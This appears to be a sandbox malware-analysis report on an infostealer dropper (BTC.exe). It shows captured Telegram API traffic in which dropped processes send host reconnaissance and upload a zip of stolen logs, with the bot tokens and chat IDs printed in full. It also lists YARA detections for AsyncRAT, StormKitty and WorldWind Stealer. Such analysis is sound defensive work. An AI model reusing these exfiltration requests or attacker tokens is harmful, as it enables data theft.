                                                  2024-09-03 04:16:41 UTC | 1756 | OUT | GET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%2 [TRUNCATED]
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:41 UTC | 389 | IN | HTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:41 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 1997
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:41 UTC | 1997 | IN | Data Ascii: {"ok":true,"result":{"message_id":6742,"from":{"id":7479631857,"is_bot":true,"first_name":"vdx3bot","username":"vdx3121Bot"},"chat":{"id":6291749148,"first_name":"VD","type":"private"},"date":1725337001,"text":"\ud83c\udf2a WorldWind Stealer 2.0.4 - Resul


                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                  6          | 192.168.2.5 | 49729       | 149.154.167.220 | 443              | 1632 | C:\Users\user\AppData\Roaming\update.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:16:41 UTC | 1809 | OUT | GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%2 [TRUNCATED]
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:41 UTC | 346 | IN | HTTP/1.1 400 Bad Request
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:41 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 56
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:41 UTC | 56 | IN | Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                  7          | 192.168.2.5 | 49730       | 149.154.167.220 | 443              | 1632 | C:\Users\user\AppData\Roaming\update.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:16:42 UTC | 171 | OUT | GET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                  Host: api.telegram.org
                                                  2024-09-03 04:16:42 UTC | 346 | IN | HTTP/1.1 400 Bad Request
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:42 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 56
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:42 UTC | 56 | IN | Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                  8          | 192.168.2.5 | 49731       | 149.154.167.220 | 443              | 1716 | C:\Users\user\AppData\Roaming\svchost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:16:42 UTC | 171 | OUT | GET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                  Host: api.telegram.org
                                                  2024-09-03 04:16:42 UTC | 388 | IN | HTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:42 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 251
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:42 UTC | 251 | IN | Data Ascii: {"ok":true,"result":{"message_id":6743,"from":{"id":7479631857,"is_bot":true,"first_name":"vdx3bot","username":"vdx3121Bot"},"chat":{"id":6291749148,"first_name":"VD","type":"private"},"date":1725337002,"text":"\ud83d\udcc1 Uploading Log Folders..."}}


                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                  9          | 192.168.2.5 | 49733       | 149.154.167.220 | 443              | 1716 | C:\Users\user\AppData\Roaming\svchost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:16:43 UTC | 254 | OUT | POST /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148 HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary="8f1a5687-0088-49e7-8d36-ee41abb7c508"
                                                  Host: api.telegram.org
                                                  Content-Length: 160724
                                                  Expect: 100-continue
                                                  2024-09-03 04:16:44 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                  2024-09-03 04:16:44 UTC | 40 | OUT | Data Ascii: --8f1a5687-0088-49e7-8d36-ee41abb7c508
                                                  2024-09-03 04:16:44 UTC | 269 | OUT | Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9493d1ccde8944e0fb5ffbe9b1372244%5Cuser%40936905
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: 68 3d 7a 52 a2 fa c5 aa cc 1c 54 23 d3 fa 7e b0 87 4d 20 44 78 c8 ef 32 3a 47 43 68 33 8c bd 61 6c 8b 35 64 9b 8b 75 85 2d 82 0f f5 88 25 80 78 c5 ce 97 45 66 f4 d6 f8 5b 5e dd 54 cc b8 c6 67 1f ab 2a f0 49 a5 d8 85 c2 b6 77 20 3b 84 60 be 20 4f ce d5 60 57 9b 1f 93 67 83 0d ab ab 87 a9 9e 13 ae ce d7 e6 55 a7 76 fc 39 fb ee 5e 6c 93 d5 b3 f0 bc 92 75 17 29 a7 33 b5 5c 35 a6 99 97 63 64 fa d3 ac 39 6b cc ac 55 1a ed 22 55 10 66 1d fd 89 74 81 e7 75 18 65 7f 0f 19 af cf 60 e4 eb 87 5c 93 97 bf e5 3b 2f 0b c7 90 5c 0e 26 59 11 5d 48 17 a0 10 df 00 4b dc e5 a5 e4 4f 67 52 a9 74 c7 01 d9 4a 4e 4e c2 48 46 a3 d0 b7 49 da 08 eb 61 87 16 8c 89 a0 f0 48 4c 39 c4 c6 3c 69 f1 31 b1 44 42 58 b3 0f 66 f7 84 ef c1 d4 aa 56 ed 30 09 fa 56 16 67 18 6f fb 07 9e a8 3b 7b
                                                  Data Ascii: h=zRT#~M Dx2:GCh3al5du-%xEf[^Tg*Iw ;` O`WgUv9^lu)3\5cd9kU"Uftue`\;/\&Y]HKOgRtJNNHFIaHL9<i1DBXfV0Vgo;{
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: 7b aa d9 19 b4 d5 75 9f af f7 c3 7c 6a fe ad 0b 52 08 2a 19 b7 32 e7 54 8b d4 f9 d8 cb 3d 49 d9 5a 4f dd e3 f8 9a 62 9c 1b 68 27 ae f9 29 70 5f a6 63 a2 fb 10 29 b5 da 11 a1 ae f6 c1 68 d4 61 35 1b 07 bc dd ec 49 24 d3 d5 9a 5c f0 39 b6 ff fc 61 4d da c1 5f e3 cb a7 41 0e 8c de 8e 5b bc d9 0b af fd 84 2f e1 e2 59 d7 3e ca c9 ef 10 bf 36 0e df d1 35 99 6a 77 12 6a 0a 89 3f f2 ae ec 7e bd d9 0e be f6 80 8a 38 6f d2 d0 fb cd 7b a4 5a 5d 19 a6 a2 aa cc e7 d3 2d 1b af d3 d6 87 53 8c 28 b5 0a 07 d8 57 df 99 76 80 7c af 3b ec 6d 75 ca ce 89 92 72 2d b3 7b 8e b3 ff cd f1 c9 fc e0 9d 07 af 0b c9 35 be 50 04 c5 44 56 a6 da 44 e8 46 ee af 1e 9a ef 09 27 48 96 3d 9a b7 2e 29 aa e7 5d df d9 80 53 28 69 9a c2 30 2a f1 93 0c 5d 31 b7 96 b3 78 e6 65 ad 80 b6 2b eb ec 87
                                                  Data Ascii: {u|jR*2T=IZObh')p_c)ha5I$\9aM_A[/Y>65jwj?~8o{Z]-S(Wv|;mur-{5PDVDF'H=.)]S(i0*]1xe+
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: e1 b5 78 08 b9 b1 57 ac 49 1a f2 5b 13 00 f7 27 d7 05 64 90 63 6b 1e d0 63 e4 02 fe c8 ae b3 a7 c3 10 84 2e 72 2f af b6 35 c2 b0 48 a3 9f 7c fa 26 31 06 71 d0 86 90 67 5e 51 89 93 33 b7 e0 61 c8 d7 1b 43 76 74 0c d9 12 d2 e3 21 d6 81 00 57 ff fa e6 9e 1f cf 26 59 96 0c be e4 cf 13 45 23 76 f3 f6 f2 92 0b 9b 03 e1 de 2c 6e e0 7d 71 d2 6b 60 1e ff a3 d3 05 af 26 98 27 58 10 a2 4f 6d 1f f5 56 03 a3 c4 96 c1 65 18 0c eb 3a e2 c9 b3 3c eb 46 02 40 41 cc 06 85 69 1f 74 3e 2b cd cf ca b2 9a f2 fc 45 1b 98 ed 38 90 93 b2 0f 93 fc 59 8f f5 82 57 4e a5 4e 03 89 f9 63 80 b9 51 31 8c 98 4c a2 15 85 77 20 2b 2c ed 05 b3 26 03 32 5f 62 a6 94 32 20 4b 59 84 24 3e 57 4d 53 c6 d7 d6 f1 2c 57 e2 c3 71 0c a8 ef d7 be 40 dd 19 a6 dc 54 07 ad 24 78 87 53 52 53 3b 82 70 b6 fb
                                                  Data Ascii: xWI['dckc.r/5H|&1qg^Q3aCvt!W&YE#v,n}qk`&'XOmVe:<F@Ait>+E8YWNNcQ1Lw +,&2_b2 KY$>WMS,Wq@T$xSRS;p
                                                  2024-09-03 04:16:48 UTC | 856 | IN | HTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:47 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 468
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  {"ok":true,"result":{"message_id":6744,"from":{"id":7479631857,"is_bot":true,"first_name":"vdx3bot","username":"vdx3121Bot"},"chat":{"id":6291749148,"first_name":"VD","type":"private"},"date":1725337007,"document":{"file_name":"C_UsersuserAppDataLocal9493d1ccde8944e0fb5ffbe9b1372244user@.zip","mime_type":"application/zip","file_id":"BQACAgUAAxkDAAIaWGbWja95dBoCtxg9zg-S1vgWZDDqAAJnDwACvuixVtF91lmts9CWNQQ","file_unique_id":"AgADZw8AAr7osVY","file_size":160371}}}


                                                  Session ID: 10
                                                  Source IP: 192.168.2.5
                                                  Source Port: 49734
                                                  Destination IP: 149.154.167.220
                                                  Destination Port: 443
                                                  PID: 1716
                                                  Process: C:\Users\user\AppData\Roaming\svchost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-03 04:16:48 UTC | 254 | OUT | POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary="f2e02031-2c41-4dad-a28a-f3bbaaed3e95"
                                                  Host: api.telegram.org
                                                  Content-Length: 160724
                                                  Expect: 100-continue
                                                  2024-09-03 04:16:48 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                  2024-09-03 04:16:48 UTC | 40 | OUT | --f2e02031-2c41-4dad-a28a-f3bbaaed3e95
                                                  2024-09-03 04:16:48 UTC | 269 | OUT | Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9493d1ccde8944e0fb5ffbe9b1372244%5Cuser%40936905
                                                  2024-09-03 04:16:49 UTC | 405 | IN | HTTP/1.1 401 Unauthorized
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:49 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 58
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  {"ok":false,"error_code":401,"description":"Unauthorized"}



                                                  Target ID:0
                                                  Start time:00:15:53
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\Desktop\BTC.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\BTC.exe"
                                                  Imagebase:0x890000
                                                  File size:1'159'168 bytes
                                                  MD5 hash:F1424E5B9810A4A9C33506AA784FCA89
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\crack.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\crack.exe"
                                                  Imagebase:0x440000
                                                  File size:8'704 bytes
                                                  MD5 hash:9215015740C937980B6B53CEE5087769
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Rezlt, Description: Yara detected Rezlt, Source: 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\crack.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_Rezlt, Description: Yara detected Rezlt, Source: C:\Users\user\AppData\Roaming\crack.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 92%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Cracked.exe"
                                                  Imagebase:0xd80000
                                                  File size:75'776 bytes
                                                  MD5 hash:0DFA83A82F6418C73406D78296DE61BE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Cracked.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Cracked.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 87%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                  Imagebase:0x5b0000
                                                  File size:174'080 bytes
                                                  MD5 hash:96014694A042D8344B910BC47D79337B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:5
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\update.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\update.exe"
                                                  Imagebase:0xc60000
                                                  File size:230'912 bytes
                                                  MD5 hash:B8DF7316CC35A0FB6FE3A326B4283010
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 96%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:6
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Window Security.exe"
                                                  Imagebase:0xce0000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
